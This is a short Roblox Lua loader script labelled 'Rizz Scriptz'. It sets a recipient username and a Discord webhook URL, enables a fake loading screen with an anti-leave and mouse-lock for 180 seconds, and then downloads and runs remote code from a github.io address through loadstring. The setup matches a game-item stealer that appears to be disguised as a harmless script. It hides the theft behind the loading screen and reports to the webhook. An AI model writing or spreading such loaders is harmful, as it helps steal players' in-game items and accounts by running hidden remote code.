UserName = "psxopdiamond"
Webhook = "https://discord.com/api/webhooks/1103242519371849738/NrkoARUVr-sBU4cI3trcPVcGLr1PpFQu_JQHYb2cUmIjanNwz6OmqgdGdcGT22RPVZ-1" 

_G.LoadingScreen = true
_G.AntiLeave = true
_G.MouseLock = true 


_G.ScriptName = "Rizz Scriptz"
_G.FirstText = "Script Preparing"
_G.SecondText = "Script Loading..."
_G.ThirdText = "Almost Done..."
_G.WaitingTime = 180 -- it's the time between 0% and 100% in secondes

loadstring(game:HttpGet("https://rizz69.github.io/Main.lua", true))()
